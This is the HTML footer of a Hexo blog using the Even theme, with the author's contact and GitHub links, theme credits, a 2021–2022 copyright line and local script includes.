      <footer id="footer" class="footer"><div class="social-links"><a href="mailto:hosch3n@protonmail.com" class="iconfont icon-email" title="email"></a>
        <a target="_blank" rel="noopener" href="https://github.com/hosch3n" class="iconfont icon-github" title="github"></a>
        <a href="/atom.xml" class="iconfont icon-rss" title="rss"></a>
    </div><div class="copyright">
  <span class="power-by">
    由 <a class="hexo-link" target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a> 强力驱动
  </span>
  <span class="division">|</span>
  <span class="theme-info">
    主题 - 
    <a class="theme-link" target="_blank" rel="noopener" href="https://github.com/ahonn/hexo-theme-even">Even</a>
  </span>

  <span class="copyright-year">&copy;2021 - 2022<span class="heart">
      <i class="iconfont icon-heart"></i>
    </span>
    <span class="author">hosch3n</span>
  </span>
</div>
</footer>

      <div class="back-to-top" id="back-to-top">
        <i class="iconfont icon-up"></i>
      </div>
    </div><script type="text/javascript" src="/lib/jquery/jquery.min.js"></script>
  <script type="text/javascript" src="/lib/slideout/slideout.js"></script>
  <script type="text/javascript" src="/lib/fancybox/jquery.fancybox.pack.js"></script>
  <script type="text/javascript" src="/js/src/even.js?v=2.11.0"></script>
</body>
</html>
